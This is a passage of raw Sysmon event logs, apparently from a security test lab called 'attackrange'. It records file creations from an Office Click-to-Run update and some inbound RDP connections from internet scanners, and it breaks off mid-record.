Office\Office16\DCF\en\SpreadsheetIQ.ExcelAddin.Resources.dllMD5=163760A3406398BFA32163ABFE735981,SHA256=2CDA91B6BA85FD7D48798CBEDD0EF83F28DA1E7A06DF6EC7C423A923C737A22B,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071450Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\SpreadsheetIQ.Diagram.Resources.dllMD5=D2155AD6BD08B6B295F62C92CDD90B2A,SHA256=5CA4285FDBBBD0F1CFCEC4035125A80D16E7AB26F7C1BEA6DEACCBB2CAC4CE29,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071449Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\SpreadsheetCompare_k_col.hxkMD5=DB9742E49C49C505B293A84518E95FA5,SHA256=1C17B95E5098ADB0C0E06AAC8A8C7C50C6A5EF1B696465D548C8A922F1D3A653,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071448Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\SpreadsheetCompare_f_col.hxkMD5=B8FBBC73DDDE31636552AB184B4E398F,SHA256=3C3702253A4695B5BCB18A2565B1D49F9F32F5F9F2442FD1395197970FA34EDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071447Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\SpreadsheetCompare_col.hxtMD5=5AC1958579D08756FDEDB946BDE3221C,SHA256=1898F85E6136A95BFB45AEAC310FBEFC647F7B286F697526CE5296DF5AB64D71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071446Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\SpreadsheetCompare_col.hxcMD5=BC90F9B9CD21C20505905F3578A7251D,SHA256=993CD231F1609F40F38B2D94B4304F00B3929E55176F59F62A504CDF8966B5EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071445Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\SpreadsheetCompare.HxSMD5=3EFF8200E992C1A8DF43E0F6458B81FF,SHA256=3D9619EF6B3199685C888868DA2C3E55ABDED9F91011202D83A7082950685296,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071444Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.360{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\DatabaseCompare_k_col.hxkMD5=DB9742E49C49C505B293A84518E95FA5,SHA256=1C17B95E5098ADB0C0E06AAC8A8C7C50C6A5EF1B696465D548C8A922F1D3A653,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071443Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.360{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\DatabaseCompare_f_col.hxkMD5=B8FBBC73DDDE31636552AB184B4E398F,SHA256=3C3702253A4695B5BCB18A2565B1D49F9F32F5F9F2442FD1395197970FA34EDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071442Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.360{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\DatabaseCompare_col.hxtMD5=7A0A9E16BB4C03ACB2BB61E6048F6685,SHA256=A6C10BCE78849F5B27125DFF8D99AA5DB8144B0A6DCA86ED93EEF3FEC2D2EF1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071441Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.360{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\DatabaseCompare_col.hxcMD5=0C0AEAD8A1877247B896303B840D9E21,SHA256=C393E8A88C65D92863F0983B845A6E44381894349EFB9C56841C32C3E744EFEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071440Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.360{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\DatabaseCompare.HxSMD5=5DC8AEA35A1B0CCA36F6CDEE5CC72DFA,SHA256=7AE50188C110AA14C8BBC997C0BEBE2F4FA8B12C6E573DE154A29B96E6C5C562,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071439Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.360{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\Common.PasswordManager.Resources.dllMD5=5B87BE84755BBB5BA577BAA3C47557AD,SHA256=DAB0CBF6832136AA9E48DDCAE3BF1467AB7B3F723F46D0B5CD301ABA2B79BB78,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071438Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.360{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\Common.FileUtils.Resources.dllMD5=8D85B68B3DCBA01B476FC728FB2ABEFF,SHA256=E83657919259189497ACBC15828AD91736125DBD441E8EA6186DB542ACA993EF,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071437Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\Common.ExcelServices.Resources.dllMD5=43D94AE0217811606BC3B4D2EB45C80A,SHA256=835A2AF22696F188BACC17BA1242917B4CEDCE2D14B00A4B381B35A0DE2F6F53,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071436Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\Common.ClientConfiguration.Resources.dllMD5=763A28F9C9441B8BE6DD7C465F3A1DD6,SHA256=5E9B6B0FE90904B572105021A00B4C3551B6E5D257CA56950297B07949FDB690,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071435Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\Common.AuditItems.Resources.dllMD5=FF61658B3DB1AE6C6A223EA747EBBF5C,SHA256=4C6CBA5CD629E8EC4910F175655EE508DC61C5D81ABE93FC5942C07BE995EBC1,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071434Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\1033\NATIVESHIM.RESOURCES.DLLMD5=599E418BBCA2DE605388A90E2D99ECB7,SHA256=A95FF0363816994D24CF9EB3DA89F6AC4D33AD796D688FA357987F7F774471F8,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071433Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\1033\VVIEWRES.DLLMD5=104EAD86919EFCC359D08B5B2D7EC442,SHA256=E587EB988FE3AC25135BB01D43E0AE139CD787C56BE94B85BC6158048E5A6ABB,IMPHASH=B3F5E92AFF2BACF941BEACB0AE100699truetrue 23542300x800000000000000071432Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.329{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\1033\VBAOWS10.CHMMD5=B372139B487135F7C8373309E664878D,SHA256=6D1F3A955B057FAEA65B580D16C31E7000A7F75A2A49C244E367FBCDBC4C1E59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071431Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.329{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\1033\STSUPLD.INTL.DLLMD5=8131283514030D8341125CB84A17C06F,SHA256=9C003349C9DA9FF682B1DC24B31CD64E1B3614C5F8188808BDD764A3D76B5867,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071430Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.329{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\1033\STSUCRES.DLLMD5=93C65D270ABE4B8510C7154F8BA8ACF4,SHA256=68A7A6F062814B619C7CF59BF6A8DBACE0AE3B31AC11259915762FBE33B135DA,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071429Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.313{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\1033\OCLTINT.DLLMD5=82D19D1DCEC2AC378803EFFA149989E8,SHA256=DC67B42864893D4FC5B83803058979DE1BA3DD5BD3B250388966EA9C8012913C,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071428Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.313{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\1033\OcHelperResource.dllMD5=535E9A7EF588555AC87FD6AF1D18A052,SHA256=ECDEC3CF54ED5FAF126A8CC7BB6F97DD8164B7CD68D1715716CD1D7DFCAB072E,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071427Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.313{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\1033\MAPISHELLR.DLLMD5=5FA4BFF4486CEF973F096A3CDDF1EF55,SHA256=3242568CDEB5D2D3E26D2D271B2B99ED3BA49F05651907DE603BFEEC61D6E904,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071426Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.313{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\1033\GrooveIntlResource.dllMD5=D1E6A4EEF01DF4D03E17683D999768AD,SHA256=495BA29975347825BB67543025DC13AB5E57BE82539F4FA50DD4AB9EEF6B06CA,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071425Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.204{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\1033\BHOINTL.DLLMD5=18D544BF38E5452B39E8570F2075E149,SHA256=C72C8BE509609634DBEB132D8192239B75DCF09F937DE8698B6199B3837870CA,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071424Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.204{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\xmsrv.dllMD5=CF5DF265075A62E4D8E9BB3B1A8BD8EC,SHA256=DA8CD5EA478C50C911D4DFA6571C4A7D5BE46406BD005C347BF98B96D96DED0C,IMPHASH=8EDD9CC3AB1EFA2B95E3DABA3DAD8ACCtruetrue 354300x800000000000000071423Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:50.618{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-59076-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000071422Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:50.328{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com65366-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000049830Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:51.036{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-52691-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049829Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:50.698{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52504-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000049828Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:49.939{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com50650-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049827Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:52.496{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6C147FB78A0788FF0E00CB98F300AC11,SHA256=FFA2BA1E6663687692B1B9FF6153BD5DE792F701E66D5A3D562C908FC05592CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049826Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:52.277{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56CC465225CFD381260581B10BFA739D,SHA256=77CA5090F66C3DFDB885299D8BFAF69AD7322D4AD6758647103FC4C67B10C1BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071598Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.985{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\msvcp100.dllMD5=D029339C0F59CF662094EDDF8C42B2B5,SHA256=934D882EFD3C0F3F1EFBC238EF87708F3879F5BB456D30AF62F3368D58B6AA4C,IMPHASH=9A218D1EC03F40ECA74839863A511CB7truetrue 23542300x800000000000000071597Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.969{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\MSCOMCTL.OCXMD5=E4FDD31405AD94D286FD1ED9459A19A2,SHA256=9CD6DB326FF95989994D4F41265A3BA7C62242AD7DACEC6621A74DDC0CBA8B9A,IMPHASH=1AFF6888560FAD03E3CEF388EEFF2F16truetrue 23542300x800000000000000071596Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\mfcm140u.dllMD5=61A335B209AFB260E54CC26ABB67B732,SHA256=B0AD34FEC4316318A27878A56C9B5C0F8DF9FA40EF59A4E0E579DDE11D517B28,IMPHASH=A327AD1805042B73A5B85682EB2DE643truetrue 23542300x800000000000000071595Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\mfc140u.dllMD5=C6A732F23B907BC6D37982F47F4B4453,SHA256=C8DAB45709404E6607B21A641895C6B6953550780B2245C3792E64244A10DA8E,IMPHASH=D774F0CF6BA79D3B787D3AE2DC21DC54truetrue 23542300x800000000000000071594Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\mfc140enu.dllMD5=A6222D950DAD1788AF996EA47B4318CF,SHA256=48D8C8BCE9DD987D6E5A1AE1B5E8A3D91F2ACA7D648F2646DE7832529273AEF1,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071593Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\mfc140.dllMD5=64FCC1C770B0B3C8321F2FF94E5C2673,SHA256=18DAA8900B4B4EB905137476E1AA6D587FD104F77374E46D75A1461FD20ACB13,IMPHASH=FEE76B44E4BD2FE21F3EC33F7FAF515Dtruetrue 23542300x800000000000000071592Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.813{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\FM20ENU.DLLMD5=B2374323C4B7BD022A114E222A5018CF,SHA256=4DED73DA8DC8CC6B79D02DCFE723AFEC99FF4B374A0ACA893109D46162C9B613,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071591Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.813{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\FM20.DLLMD5=82C319829759CFF6FA46E503B11E89E2,SHA256=984290ABD9FF8FF35D390738FD2346BDBA6F1372E678F320EF5D5DC7A3A92CE5,IMPHASH=7376C7233364624EB09E30DB730912B3truetrue 23542300x800000000000000071590Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.782{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\concrt140.dllMD5=EB42B164D603672E07997019BB00E4AD,SHA256=DABDB0732B2FC14040CEDBBFD369D9EB3C7A2E66B38A79892E1C05E6D6A8526D,IMPHASH=E29B9617328962A9B58721E88E2FD959truetrue 23542300x800000000000000071589Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.782{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\atl110.dllMD5=FE00086A2FC935AF640C7F302C12FE89,SHA256=873D57E5CD660D49B403780685E91B6E3BC9E65B6E59435E0C5A5DFA1DE0422C,IMPHASH=8CA7AED35B720AAC9EC88ED55BAD59B3truetrue 23542300x800000000000000071588Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.766{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 